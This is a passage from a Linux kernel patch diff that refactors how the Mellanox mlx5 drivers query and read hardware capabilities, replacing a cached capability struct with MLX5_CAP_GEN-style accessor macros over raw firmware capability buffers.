"wqe_cnt %d, max_wqes %d\n", - qp->sq.wqe_cnt, gen->max_wqes); + qp->sq.wqe_cnt, + 1 << MLX5_CAP_GEN(dev->mdev, log_max_qp_sz)); return -EINVAL; } @@ -866,22 +863,21 @@ static int create_qp_common(struct mlx5_ib_dev *dev, struct ib_pd *pd, struct ib_udata *udata, struct mlx5_ib_qp *qp) { struct mlx5_ib_resources *devr = &dev->devr; + struct mlx5_core_dev *mdev = dev->mdev; struct mlx5_ib_create_qp_resp resp; struct mlx5_create_qp_mbox_in *in; - struct mlx5_general_caps *gen; struct mlx5_ib_create_qp ucmd; int inlen = sizeof(*in); int err; mlx5_ib_odp_create_qp(qp); - gen = &dev->mdev->caps.gen; mutex_init(&qp->mutex); spin_lock_init(&qp->sq.lock); spin_lock_init(&qp->rq.lock); if (init_attr->create_flags & IB_QP_CREATE_BLOCK_MULTICAST_LOOPBACK) { - if (!(gen->flags & MLX5_DEV_CAP_FLAG_BLOCK_MCAST)) { + if (!MLX5_CAP_GEN(mdev, block_lb_mc)) { mlx5_ib_dbg(dev, "block multicast loopback isn't supported\n"); return -EINVAL; } else { @@ -914,15 +910,17 @@ static int create_qp_common(struct mlx5_ib_dev *dev, struct ib_pd *pd, if (pd) { if (pd->uobject) { + __u32 max_wqes = + 1 << MLX5_CAP_GEN(mdev, log_max_qp_sz); mlx5_ib_dbg(dev, "requested sq_wqe_count (%d)\n", ucmd.sq_wqe_count); if (ucmd.rq_wqe_shift != qp->rq.wqe_shift || ucmd.rq_wqe_count != qp->rq.wqe_cnt) { mlx5_ib_dbg(dev, "invalid rq params\n"); return -EINVAL; } - if (ucmd.sq_wqe_count > gen->max_wqes) { + if (ucmd.sq_wqe_count > max_wqes) { mlx5_ib_dbg(dev, "requested sq_wqe_count (%d) > max allowed (%d)\n", - ucmd.sq_wqe_count, gen->max_wqes); + ucmd.sq_wqe_count, max_wqes); return -EINVAL; } err = create_user_qp(dev, pd, qp, udata, &in, &resp, &inlen); @@ -1226,7 +1224,6 @@ struct ib_qp *mlx5_ib_create_qp(struct ib_pd *pd, struct ib_qp_init_attr *init_attr, struct ib_udata *udata) { - struct mlx5_general_caps *gen; struct mlx5_ib_dev *dev; struct mlx5_ib_qp *qp; u16 xrcdn = 0; @@ -1244,12 +1241,11 @@ struct ib_qp *mlx5_ib_create_qp(struct ib_pd *pd, } dev = to_mdev(to_mxrcd(init_attr->xrcd)->ibxrcd.device); } - gen = &dev->mdev->caps.gen; switch (init_attr->qp_type) { case IB_QPT_XRC_TGT: case IB_QPT_XRC_INI: - if (!(gen->flags & MLX5_DEV_CAP_FLAG_XRC)) { + if (!MLX5_CAP_GEN(dev->mdev, xrc)) { mlx5_ib_dbg(dev, "XRC not supported\n"); return ERR_PTR(-ENOSYS); } @@ -1356,9 +1352,6 @@ enum { static int ib_rate_to_mlx5(struct mlx5_ib_dev *dev, u8 rate) { - struct mlx5_general_caps *gen; - - gen = &dev->mdev->caps.gen; if (rate == IB_RATE_PORT_CURRENT) { return 0; } else if (rate < IB_RATE_2_5_GBPS || rate > IB_RATE_300_GBPS) { @@ -1366,7 +1359,7 @@ static int ib_rate_to_mlx5(struct mlx5_ib_dev *dev, u8 rate) } else { while (rate != IB_RATE_2_5_GBPS && !(1 << (rate + MLX5_STAT_RATE_OFFSET) & - gen->stat_rate_support)) + MLX5_CAP_GEN(dev->mdev, stat_rate_support))) --rate; } @@ -1377,10 +1370,8 @@ static int mlx5_set_path(struct mlx5_ib_dev *dev, const struct ib_ah_attr *ah, struct mlx5_qp_path *path, u8 port, int attr_mask, u32 path_flags, const struct ib_qp_attr *attr) { - struct mlx5_general_caps *gen; int err; - gen = &dev->mdev->caps.gen; path->fl = (path_flags & MLX5_PATH_FLAG_FL) ? 0x80 : 0; path->free_ar = (path_flags & MLX5_PATH_FLAG_FREE_AR) ? 0x80 : 0; @@ -1391,9 +1382,11 @@ static int mlx5_set_path(struct mlx5_ib_dev *dev, const struct ib_ah_attr *ah, path->rlid = cpu_to_be16(ah->dlid); if (ah->ah_flags & IB_AH_GRH) { - if (ah->grh.sgid_index >= gen->port[port - 1].gid_table_len) { + if (ah->grh.sgid_index >= + dev->mdev->port_caps[port - 1].gid_table_len) { pr_err("sgid_index (%u) too large. max is %d\n", - ah->grh.sgid_index, gen->port[port - 1].gid_table_len); + ah->grh.sgid_index, + dev->mdev->port_caps[port - 1].gid_table_len); return -EINVAL; } path->grh_mlid |= 1 << 7; @@ -1570,7 +1563,6 @@ static int __mlx5_ib_modify_qp(struct ib_qp *ibqp, struct mlx5_ib_qp *qp = to_mqp(ibqp); struct mlx5_ib_cq *send_cq, *recv_cq; struct mlx5_qp_context *context; - struct mlx5_general_caps *gen; struct mlx5_modify_qp_mbox_in *in; struct mlx5_ib_pd *pd; enum mlx5_qp_state mlx5_cur, mlx5_new; @@ -1579,7 +1571,6 @@ static int __mlx5_ib_modify_qp(struct ib_qp *ibqp, int mlx5_st; int err; - gen = &dev->mdev->caps.gen; in = kzalloc(sizeof(*in), GFP_KERNEL); if (!in) return -ENOMEM; @@ -1619,7 +1610,8 @@ static int __mlx5_ib_modify_qp(struct ib_qp *ibqp, err = -EINVAL; goto out; } - context->mtu_msgmax = (attr->path_mtu << 5) | gen->log_max_msg; + context->mtu_msgmax = (attr->path_mtu << 5) | + (u8)MLX5_CAP_GEN(dev->mdev, log_max_msg); } if (attr_mask & IB_QP_DEST_QPN) @@ -1777,11 +1769,9 @@ int mlx5_ib_modify_qp(struct ib_qp *ibqp, struct ib_qp_attr *attr, struct mlx5_ib_dev *dev = to_mdev(ibqp->device); struct mlx5_ib_qp *qp = to_mqp(ibqp); enum ib_qp_state cur_state, new_state; - struct mlx5_general_caps *gen; int err = -EINVAL; int port; - gen = &dev->mdev->caps.gen; mutex_lock(&qp->mutex); cur_state = attr_mask & IB_QP_CUR_STATE ? attr->cur_qp_state : qp->state; @@ -1793,21 +1783,25 @@ int mlx5_ib_modify_qp(struct ib_qp *ibqp, struct ib_qp_attr *attr, goto out; if ((attr_mask & IB_QP_PORT) && - (attr->port_num == 0 || attr->port_num > gen->num_ports)) + (attr->port_num == 0 || + attr->port_num > MLX5_CAP_GEN(dev->mdev, num_ports))) goto out; if (attr_mask & IB_QP_PKEY_INDEX) { port = attr_mask & IB_QP_PORT ? attr->port_num : qp->port; - if (attr->pkey_index >= gen->port[port - 1].pkey_table_len) + if (attr->pkey_index >= + dev->mdev->port_caps[port - 1].pkey_table_len) goto out; } if (attr_mask & IB_QP_MAX_QP_RD_ATOMIC && - attr->max_rd_atomic > (1 << gen->log_max_ra_res_qp)) + attr->max_rd_atomic > + (1 << MLX5_CAP_GEN(dev->mdev, log_max_ra_res_qp))) goto out; if (attr_mask & IB_QP_MAX_DEST_RD_ATOMIC && - attr->max_dest_rd_atomic > (1 << gen->log_max_ra_req_qp)) + attr->max_dest_rd_atomic > + (1 << MLX5_CAP_GEN(dev->mdev, log_max_ra_req_qp))) goto out; if (cur_state == new_state && cur_state == IB_QPS_RESET) { @@ -3009,7 +3003,7 @@ static void to_ib_ah_attr(struct mlx5_ib_dev *ibdev, struct ib_ah_attr *ib_ah_at ib_ah_attr->port_num = path->port; if (ib_ah_attr->port_num == 0 || - ib_ah_attr->port_num > dev->caps.gen.num_ports) + ib_ah_attr->port_num > MLX5_CAP_GEN(dev, num_ports)) return; ib_ah_attr->sl = path->sl & 0xf; @@ -3135,12 +3129,10 @@ struct ib_xrcd *mlx5_ib_alloc_xrcd(struct ib_device *ibdev, struct ib_udata *udata) { struct mlx5_ib_dev *dev = to_mdev(ibdev); - struct mlx5_general_caps *gen; struct mlx5_ib_xrcd *xrcd; int err; - gen = &dev->mdev->caps.gen; - if (!(gen->flags & MLX5_DEV_CAP_FLAG_XRC)) + if (!MLX5_CAP_GEN(dev->mdev, xrc)) return ERR_PTR(-ENOSYS); xrcd = kmalloc(sizeof(*xrcd), GFP_KERNEL); diff --git a/drivers/infiniband/hw/mlx5/srq.c b/drivers/infiniband/hw/mlx5/srq.c index 4242e1ded868..e8e8e942fa4a 100644 --- a/drivers/infiniband/hw/mlx5/srq.c +++ b/drivers/infiniband/hw/mlx5/srq.c @@ -236,7 +236,6 @@ struct ib_srq *mlx5_ib_create_srq(struct ib_pd *pd, struct ib_udata *udata) { struct mlx5_ib_dev *dev = to_mdev(pd->device); - struct mlx5_general_caps *gen; struct mlx5_ib_srq *srq; int desc_size; int buf_size; @@ -245,13 +244,13 @@ struct ib_srq *mlx5_ib_create_srq(struct ib_pd *pd, int uninitialized_var(inlen); int is_xrc; u32 flgs, xrcdn; + __u32 max_srq_wqes = 1 << MLX5_CAP_GEN(dev->mdev, log_max_srq_sz); - gen = &dev->mdev->caps.gen; /* Sanity check SRQ size before proceeding */ - if (init_attr->attr.max_wr >= gen->max_srq_wqes) { + if (init_attr->attr.max_wr >= max_srq_wqes) { mlx5_ib_dbg(dev, "max_wr %d, cap %d\n", init_attr->attr.max_wr, - gen->max_srq_wqes); + max_srq_wqes); return ERR_PTR(-EINVAL); } diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eq.c b/drivers/net/ethernet/mellanox/mlx5/core/eq.c index 516efc25fc4f..a40b96d4c662 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/eq.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/eq.c @@ -455,7 +455,7 @@ int mlx5_start_eqs(struct mlx5_core_dev *dev) u32 async_event_mask = MLX5_ASYNC_EVENT_MASK; int err; - if (dev->caps.gen.flags & MLX5_DEV_CAP_FLAG_ON_DMND_PG) + if (MLX5_CAP_GEN(dev, pg)) async_event_mask |= (1ull << MLX5_EVENT_TYPE_PAGE_FAULT); err = mlx5_create_map_eq(dev, &table->cmd_eq, MLX5_EQ_VEC_CMD, @@ -478,7 +478,7 @@ int mlx5_start_eqs(struct mlx5_core_dev *dev) err = mlx5_create_map_eq(dev, &table->pages_eq, MLX5_EQ_VEC_PAGES, - dev->caps.gen.max_vf + 1, + /* TODO: sriov max_vf + */ 1, 1 << MLX5_EVENT_TYPE_PAGE_REQUEST, "mlx5_pages_eq", &dev->priv.uuari.uars[0]); if (err) { diff --git a/drivers/net/ethernet/mellanox/mlx5/core/fw.c b/drivers/net/ethernet/mellanox/mlx5/core/fw.c index ef9b7695decd..801ccadd709a 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/fw.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/fw.c @@ -64,50 +64,74 @@ int mlx5_cmd_query_adapter(struct mlx5_core_dev *dev) return err; } -int mlx5_cmd_query_hca_cap(struct mlx5_core_dev *dev, struct mlx5_caps *caps) +int mlx5_query_hca_caps(struct mlx5_core_dev *dev) { - return mlx5_core_get_caps(dev, caps, HCA_CAP_OPMOD_GET_CUR); -} - -int mlx5_query_odp_caps(struct mlx5_core_dev *dev, struct mlx5_odp_caps *caps) -{ - u8 in[MLX5_ST_SZ_BYTES(query_hca_cap_in)]; - int out_sz = MLX5_ST_SZ_BYTES(query_hca_cap_out); - void *out; int err; - if (!(dev->caps.gen.flags & MLX5_DEV_CAP_FLAG_ON_DMND_PG)) - return -ENOTSUPP; + err = mlx5_core_get_caps(dev, MLX5_CAP_GENERAL, HCA_CAP_OPMOD_GET_CUR); + if (err) + return err; - memset(in, 0, sizeof(in)); - out = kzalloc(out_sz, GFP_KERNEL); - if (!out) - return -ENOMEM; - MLX5_SET(query_hca_cap_in, in, opcode, MLX5_CMD_OP_QUERY_HCA_CAP); - MLX5_SET(query_hca_cap_in, in, op_mod, HCA_CAP_OPMOD_GET_ODP_CUR); - err = mlx5_cmd_exec(dev, in, sizeof(in), out, out_sz); + err = mlx5_core_get_caps(dev, MLX5_CAP_GENERAL, HCA_CAP_OPMOD_GET_MAX); if (err) - goto out; + return err; - err = mlx5_cmd_status_to_err_v2(out); - if (err) { - mlx5_core_warn(dev, "query cur hca ODP caps failed, %d\n", err); - goto out; + if (MLX5_CAP_GEN(dev, eth_net_offloads)) { + err = mlx5_core_get_caps(dev, MLX5_CAP_ETHERNET_OFFLOADS, + HCA_CAP_OPMOD_GET_CUR); + if (err) + return err; + err = mlx5_core_get_caps(dev, MLX5_CAP_ETHERNET_OFFLOADS, + HCA_CAP_OPMOD_GET_MAX); + if (err) + return err; } - memcpy(caps, MLX5_ADDR_OF(query_hca_cap_out, out, capability), - sizeof(*caps)); + if (MLX5_CAP_GEN(dev, pg)) { + err = mlx5_core_get_caps(dev, MLX5_CAP_ODP, + HCA_CAP_OPMOD_GET_CUR); + if (err) + return err; + err = mlx5_core_get_caps(dev, MLX5_CAP_ODP, + HCA_CAP_OPMOD_GET_MAX); + if (err) + return err; + } - mlx5_core_dbg(dev, "on-demand paging capabilities:\nrc: %08x\nuc: %08x\nud: %08x\n", - be32_to_cpu(caps->per_transport_caps.rc_odp_caps), - be32_to_cpu(caps->per_transport_caps.uc_odp_caps), - be32_to_cpu(caps->per_transport_caps.ud_odp_caps)); + if (MLX5_CAP_GEN(dev, atomic)) { + err = mlx5_core_get_caps(dev, MLX5_CAP_ATOMIC, + HCA_CAP_OPMOD_GET_CUR); + if (err) + return err; + err = mlx5_core_get_caps(dev, MLX5_CAP_ATOMIC, + HCA_CAP_OPMOD_GET_MAX); + if (err) + return err; + } -out: - kfree(out); - return err; + if (MLX5_CAP_GEN(dev, roce)) { + err = mlx5_core_get_caps(dev, MLX5_CAP_ROCE, + HCA_CAP_OPMOD_GET_CUR); + if (err) + return err; + err = mlx5_core_get_caps(dev, MLX5_CAP_ROCE, + HCA_CAP_OPMOD_GET_MAX); + if (err) + return err; + } + + if (MLX5_CAP_GEN(dev, nic_flow_table)) { + err = mlx5_core_get_caps(dev, MLX5_CAP_FLOW_TABLE, + HCA_CAP_OPMOD_GET_CUR); + if (err) + return err; + err = mlx5_core_get_caps(dev, MLX5_CAP_FLOW_TABLE, + HCA_CAP_OPMOD_GET_MAX); + if (err) + return err; + } + return 0; } -EXPORT_SYMBOL(mlx5_query_odp_caps); int mlx5_cmd_init_hca(struct mlx5_core_dev *dev) { diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c index a652cb93ceaa..e7b7b123a128 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/main.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c @@ -211,11 +211,12 @@ static int mlx5_enable_msix(struct mlx5_core_dev *dev) { struct mlx5_priv *priv = &dev->priv; struct mlx5_eq_table *table = &priv->eq_table; - int num_eqs = 1 << dev->caps.gen.log_max_eq; + int num_eqs = 1 << MLX5_CAP_GEN(dev, log_max_eq); int nvec; int i; - nvec = dev->caps.gen.num_ports * num_online_cpus() + MLX5_EQ_VEC_COMP_BASE; + nvec = MLX5_CAP_GEN(dev, num_ports) * num_online_cpus() + + MLX5_EQ_VEC_COMP_BASE; nvec = min_t(int, nvec, num_eqs); if (nvec <= MLX5_EQ_VEC_COMP_BASE) return -ENOMEM; @@ -287,97 +288,28 @@ static u16 to_fw_pkey_sz(u32 size) } } -/* selectively copy writable fields clearing any reserved area - */ -static void copy_rw_fields(void *to, struct mlx5_caps *from) -{ - __be64 *flags_off = (__be64 *)MLX5_ADDR_OF(cmd_hca_cap, to, reserved_22); - u64 v64; - - MLX5_SET(cmd_hca_cap, to, log_max_qp, from->gen.log_max_qp); - MLX5_SET(cmd_hca_cap, to, log_max_ra_req_qp, from->gen.log_max_ra_req_qp); - MLX5_SET(cmd_hca_cap, to, log_max_ra_res_qp, from->gen.log_max_ra_res_qp); - MLX5_SET(cmd_hca_cap, to, pkey_table_size, from->gen.pkey_table_size); - MLX5_SET(cmd_hca_cap, to, pkey_table_size, to_fw_pkey_sz(from->gen.pkey_table_size)); - MLX5_SET(cmd_hca_cap, to, log_uar_page_sz, PAGE_SHIFT - 12); - v64 = from->gen.flags & MLX5_CAP_BITS_RW_MASK; - *flags_off = cpu_to_be64(v64); -} - -static u16 get_pkey_table_size(int pkey) +static u16 to_sw_pkey_sz(int pkey_sz) { - if (pkey > MLX5_MAX_LOG_PKEY_TABLE) + if (pkey_sz > MLX5_MAX_LOG_PKEY_TABLE) return 0; - return MLX5_MIN_PKEY_TABLE_SIZE << pkey; -} - -static void fw2drv_caps(struct mlx5_caps *caps, void *out) -{ - struct mlx5_general_caps *gen = &caps->gen; - - gen->max_srq_wqes = 1 << MLX5_GET_PR(cmd_hca_cap, out, log_max_srq_sz); - gen->max_wqes = 1 << MLX5_GET_PR(cmd_hca_cap, out, log_max_qp_sz); - gen->log_max_qp = MLX5_GET_PR(cmd_hca_cap, out, log_max_qp); - gen->log_max_srq = MLX5_GET_PR(cmd_hca_cap, out, log_max_srq); - gen->max_cqes = 1 << MLX5_GET_PR(cmd_hca_cap, out, log_max_cq_sz); - gen->log_max_cq = MLX5_GET_PR(cmd_hca_cap, out, log_max_cq); - gen->max_eqes = 1 << MLX5_GET_PR(cmd_hca_cap, out, log_max_eq_sz); - gen->log_max_mkey = MLX5_GET_PR(cmd_hca_cap, out, log_max_mkey); - gen->log_max_eq = MLX5_GET_PR(cmd_hca_cap, out, log_max_eq); - gen->max_indirection = MLX5_GET_PR(cmd_hca_cap, out, max_indirection); - gen->log_max_mrw_sz = MLX5_GET_PR(cmd_hca_cap, out, log_max_mrw_sz); - gen->log_max_bsf_list_size = MLX5_GET_PR(cmd_hca_cap, out, log_max_bsf_list_size); - gen->log_max_klm_list_size = MLX5_GET_PR(cmd_hca_cap, out, log_max_klm_list_size); - gen->log_max_ra_req_dc = MLX5_GET_PR(cmd_hca_cap, out, log_max_ra_req_dc); - gen->log_max_ra_res_dc = MLX5_GET_PR(cmd_hca_cap, out, log_max_ra_res_dc); - gen->log_max_ra_req_qp = MLX5_GET_PR(cmd_hca_cap, out, log_max_ra_req_qp); - gen->log_max_ra_res_qp = MLX5_GET_PR(cmd_hca_cap, out, log_max_ra_res_qp); - gen->max_qp_counters = MLX5_GET_PR(cmd_hca_cap, out, max_qp_cnt); - gen->pkey_table_size = get_pkey_table_size(MLX5_GET_PR(cmd_hca_cap, out, pkey_table_size)); - gen->local_ca_ack_delay = MLX5_GET_PR(cmd_hca_cap, out, local_ca_ack_delay); - gen->num_ports = MLX5_GET_PR(cmd_hca_cap, out, num_ports); - gen->log_max_msg = MLX5_GET_PR(cmd_hca_cap, out, log_max_msg); - gen->stat_rate_support = MLX5_GET_PR(cmd_hca_cap, out, stat_rate_support); - gen->flags = be64_to_cpu(*(__be64 *)MLX5_ADDR_OF(cmd_hca_cap, out, reserved_22)); - pr_debug("flags = 0x%llx\n", gen->flags); - gen->uar_sz = MLX5_GET_PR(cmd_hca_cap, out, uar_sz); - gen->min_log_pg_sz = MLX5_GET_PR(cmd_hca_cap, out, log_pg_sz); - gen->bf_reg_size = MLX5_GET_PR(cmd_hca_cap, out, bf); - gen->bf_reg_size = 1 << MLX5_GET_PR(cmd_hca_cap, out, log_bf_reg_size); - gen->max_sq_desc_sz = MLX5_GET_PR(cmd_hca_cap, out, max_wqe_sz_sq); - gen->max_rq_desc_sz = MLX5_GET_PR(cmd_hca_cap, out, max_wqe_sz_rq); - gen->max_dc_sq_desc_sz = MLX5_GET_PR(cmd_hca_cap, out, max_wqe_sz_sq_dc); - gen->max_qp_mcg = MLX5_GET_PR(cmd_hca_cap, out, max_qp_mcg); - gen->log_max_pd = MLX5_GET_PR(cmd_hca_cap, out, log_max_pd); - gen->log_max_xrcd = MLX5_GET_PR(cmd_hca_cap, out, log_max_xrcd); - gen->log_uar_page_sz = MLX5_GET_PR(cmd_hca_cap, out, log_uar_page_sz); -} - -static const char *caps_opmod_str(u16 opmod) -{ - switch (opmod) { - case HCA_CAP_OPMOD_GET_MAX: - return "GET_MAX"; - case HCA_CAP_OPMOD_GET_CUR: - return "GET_CUR"; - default: - return "Invalid"; - } + return MLX5_MIN_PKEY_TABLE_SIZE << pkey_sz; } -int mlx5_core_get_caps(struct mlx5_core_dev *dev, struct mlx5_caps *caps, - u16 opmod) +int mlx5_core_get_caps(struct mlx5_core_dev *dev, enum mlx5_cap_type cap_type, + enum mlx5_cap_mode cap_mode) { u8 in[MLX5_ST_SZ_BYTES(query_hca_cap_in)]; int out_sz = MLX5_ST_SZ_BYTES(query_hca_cap_out); - void *out; + void *out, *hca_caps; + u16 opmod = (cap_type << 1) | (cap_mode & 0x01); int err; memset(in, 0, sizeof(in)); out = kzalloc(out_sz, GFP_KERNEL); if (!out) return -ENOMEM; + MLX5_SET(query_hca_cap_in, in, opcode, MLX5_CMD_OP_QUERY_HCA_CAP); MLX5_SET(query_hca_cap_in, in, op_mod, opmod); err = mlx5_cmd_exec(dev, in, sizeof(in), out, out_sz); @@ -386,12 +318,30 @@ int mlx5_core_get_caps(struct mlx5_core_dev *dev, struct mlx5_caps *caps, err = mlx5_cmd_status_to_err_v2(out); if (err) { - mlx5_core_warn(dev, "query max hca cap failed, %d\n", err); + mlx5_core_warn(dev, + "QUERY_HCA_CAP : type(%x) opmode(%x) Failed(%d)\n", + cap_type, cap_mode, err); goto query_ex; } - mlx5_core_dbg(dev, "%s\n", caps_opmod_str(opmod)); - fw2drv_caps(caps, MLX5_ADDR_OF(query_hca_cap_out, out, capability)); + hca_caps = MLX5_ADDR_OF(query_hca_cap_out, out, capability); + + switch (cap_mode) { + case HCA_CAP_OPMOD_GET_MAX: + memcpy(dev->hca_caps_max[cap_type], hca_caps, + MLX5_UN_SZ_BYTES(hca_cap_union)); + break; + case HCA_CAP_OPMOD_GET_CUR: + memcpy(dev->hca_caps_cur[cap_type], hca_caps, + MLX5_UN_SZ_BYTES(hca_cap_union)); + break; + default: + mlx5_core_warn(dev, + "Tried to query dev cap type(%x) with wrong opmode(%x)\n", + cap_type, cap_mode); + err = -EINVAL; + break; + } query_ex: kfree(out); return err; @@ -418,49 +368,45 @@ static int handle_hca_cap(struct mlx5_core_dev *dev) { void *set_ctx = NULL; struct mlx5_profile *prof = dev->profile; - struct mlx5_caps *cur_caps = NULL; - struct mlx5_caps *max_caps = NULL; int err = -ENOMEM; int set_sz = MLX5_ST_SZ_BYTES(set_hca_cap_in); + void *set_hca_cap; set_ctx = kzalloc(set_sz, GFP_KERNEL); if (!set_ctx) goto query_ex; - max_caps = kzalloc(sizeof(*max_caps), GFP_KERNEL); - if (!max_caps) - goto query_ex; - - cur_caps = kzalloc(sizeof(*cur_caps), GFP_KERNEL); - if (!cur_caps) - goto query_ex; - - err = mlx5_core_get_caps(dev, max_caps, HCA_CAP_OPMOD_GET_MAX); + err = mlx5_core_get_caps(dev, MLX5_CAP_GENERAL, HCA_CAP_OPMOD_GET_MAX); if (err) goto query_ex; - err = mlx5_core_get_caps(dev, cur_caps, HCA_CAP_OPMOD_GET_CUR); + err = mlx5_core_get_caps(dev, MLX5_CAP_GENERAL, HCA_CAP_OPMOD_GET_CUR); if (err) goto query_ex; + set_hca_cap = MLX5_ADDR_OF(set_hca_cap_in, set_ctx, + capability); + memcpy(set_hca_cap, dev->hca_caps_cur[MLX5_CAP_GENERAL], + MLX5_ST_SZ_BYTES(cmd_hca_cap)); + + mlx5_core_dbg(dev, "Current Pkey table size %d Setting new size %d\n", + to_sw_pkey_sz(MLX5_CAP_GEN(dev, pkey_table_size)), + 128); /* we limit the size of the pkey table to 128 entries for now */ - cur_caps->gen.pkey_table_size = 128; + MLX5_SET(cmd_hca_cap, set_hca_cap, pkey_table_size, + to_fw_pkey_sz(128)); if (prof->mask & MLX5_PROF_MASK_QP_SIZE) - cur_caps->gen.log_max_qp = prof->log_max_qp; + MLX5_SET(cmd_hca_cap, set_hca_cap, log_max_qp, + prof->log_max_qp); - /* disable checksum */ - cur_caps->gen.flags &= ~MLX5_DEV_CAP_FLAG_CMDIF_CSUM; + /* disable cmdif checksum */ + MLX5_SET(cmd_hca_cap, set_hca_cap, cmdif_checksum, 0); - copy_rw_fields(MLX5_ADDR_OF(set_hca_cap_in, set_ctx, capability), - cur_caps); err = set_caps(dev, set_ctx, set_sz); query_ex: - kfree(cur_caps); - kfree(max_caps); kfree(set_ctx); - return err; } @@ -768,7 +714,7 @@ static int mlx5_dev_init(struct mlx5_core_dev *dev, struct pci_dev *pdev) mlx5_start_health_poll(dev); - err = mlx5_cmd_query_hca_cap(dev, &dev->caps); + err = mlx5_query_hca_caps(dev); if (err) { dev_err(&pdev->dev, "query hca failed\n"); goto err_stop_poll; diff --git a/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h b/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h index a051b906afdf..b986f1c258bc 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h +++ b/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h @@ -65,9 +65,15 @@ enum { MLX5_CMD_TIME, /* print command execution time */ }; +static inline int mlx5_cmd_exec_check_status(struct mlx5_core_dev *dev, u32 *in, + int in_size, u32 *out, + int out_size) +{ + mlx5_cmd_exec(dev, in, in_size, out, out_size); + return mlx5_cmd_status_to_err((struct mlx5_outbox_hdr *)out); +} -int mlx5_cmd_query_hca_cap(struct mlx5_core_dev *dev, - struct mlx5_caps *caps); +int mlx5_query_hca_caps(struct mlx5_core_dev *dev); int mlx5_cmd_query_adapter(struct mlx5_core_dev *dev); int mlx5_cmd_init_hca(struct mlx5_core_dev *dev); int mlx5_cmd_teardown_hca(struct mlx5_core_dev *dev); diff --git a/drivers/net/ethernet/mellanox/mlx5/core/uar.c b/drivers/net/ethernet/mellanox/mlx5/core/uar.c index ba58f6d7c761..9ef85873ceea 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/uar.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/uar.c @@ -175,12 +175,13 @@ int mlx5_alloc_uuars(struct mlx5_core_dev *dev, struct mlx5_uuar_info *uuari) for (i = 0; i < tot_uuars; i++) { bf = &uuari->bfs[i]; - bf->buf_size = dev->caps.gen.bf_reg_size / 2; + bf->buf_size = (1 << MLX5_CAP_GEN(dev, log_bf_reg_size)) / 2; bf->uar = &uuari->uars[i / MLX5_BF_REGS_PER_PAGE]; bf->regreg = uuari->uars[i / MLX5_BF_REGS_PER_PAGE].map; bf->reg = NULL; /* Add WC support */ - bf->offset = (i % MLX5_BF_REGS_PER_PAGE) * dev->caps.gen.bf_reg_size + - MLX5_BF_OFFSET; + bf->offset = (i % MLX5_BF_REGS_PER_PAGE) * + (1 << MLX5_CAP_GEN(dev, log_bf_reg_size)) + + MLX5_BF_OFFSET; bf->need_lock = need_uuar_lock(i); spin_lock_init(&bf->lock); spin_lock_init(&bf->lock32); diff --git a/include/linux/mlx5/device.h b/include/linux/mlx5/device.h index feebed7b392b..4ee52bf1f959 100644 --- a/include/linux/mlx5/device.h +++ b/include/linux/mlx5/device.h @@ -59,6 +59,8 @@ #define MLX5_FLD_SZ_BYTES(typ, fld) (__mlx5_bit_sz(typ, fld) / 8) #define MLX5_ST_SZ_BYTES(typ) (sizeof(struct mlx5_ifc_##typ##_bits) / 8) #define MLX5_ST_SZ_DW(typ) (sizeof(struct mlx5_ifc_##typ##_bits) / 32) +#define MLX5_UN_SZ_BYTES(typ) (sizeof(union mlx5_ifc_##typ##_bits) / 8) +#define MLX5_UN_SZ_DW(typ) (sizeof(union mlx5_ifc_##typ##_bits) / 32) #define MLX5_BYTE_OFF(typ, fld) (__mlx5_bit_off(typ, fld) / 8) #define MLX5_ADDR_OF(typ, p, fld) ((char *)(p) + MLX5_BYTE_OFF(typ, fld)) @@ -322,13 +324,6 @@ enum { MLX5_CAP_OFF_CMDIF_CSUM = 46, }; -enum { - HCA_CAP_OPMOD_GET_MAX = 0, - HCA_CAP_OPMOD_GET_CUR = 1, - HCA_CAP_OPMOD_GET_ODP_MAX = 4, - HCA_CAP_OPMOD_GET_ODP_CUR = 5 -}; - struct mlx5_inbox_hdr { __be16 opcode; u8 rsvd[4]; @@ -1101,4 +1096,61 @@ enum { MLX5_RQC_RQ_TYPE_MEMORY_RQ_RPM = 0x1, }; +/* MLX5 DEV CAPs */ + +/* TODO: EAT.ME */ +enum mlx5_cap_mode { + HCA_CAP_OPMOD_GET_MAX = 0, + HCA_CAP_OPMOD_GET_CUR = 1, +}; + +enum mlx5_cap_type { + MLX5_CAP_GENERAL = 0, + MLX5_CAP_ETHERNET_OFFLOADS, + MLX5_CAP_ODP, + MLX5_CAP_ATOMIC, + MLX5_CAP_ROCE, + MLX5_CAP_IPOIB_OFFLOADS, + MLX5_CAP_EOIB_OFFLOADS, + MLX5_CAP_FLOW_TABLE, + /* NUM OF CAP Types */ + MLX5_CAP_NUM +}; + +/* GET Dev Caps macros */ +#define MLX5_CAP_GEN(mdev, cap) \ + MLX5_GET(cmd_hca_cap, mdev->hca_caps_cur[MLX5_CAP_GENERAL], cap) + +#define MLX5_CAP_GEN_MAX(mdev, cap) \ + MLX5_GET(cmd_hca_cap, mdev->hca_caps_max[MLX5_CAP_GENERAL], cap) + +#define MLX5_CAP_ETH(mdev, cap) \ + MLX5_GET(per_protocol_networking_offload_caps,\ + mdev->hca_caps_cur[MLX5_CAP_ETHERNET_OFFLOADS], cap) + +#define MLX5_CAP_ETH_MAX(mdev, cap) \ + MLX5_GET(per_protocol_networking_offload_caps,\ + mdev->hca_caps_max[MLX5_CAP_ETHERNET_OFFLOADS], cap) + +#define MLX5_CAP_ROCE(mdev, cap) \ + MLX5_GET(roce_cap, mdev->hca_caps_cur[MLX5_CAP_ROCE], cap) + +#define MLX5_CAP_ROCE_MAX(mdev, cap) \ + MLX5_GET(roce_cap, mdev->hca_caps_max[MLX5_CAP_ROCE], cap) + +#define MLX5_CAP_ATOMIC(mdev, cap) \ + MLX5_GET(atomic_caps, 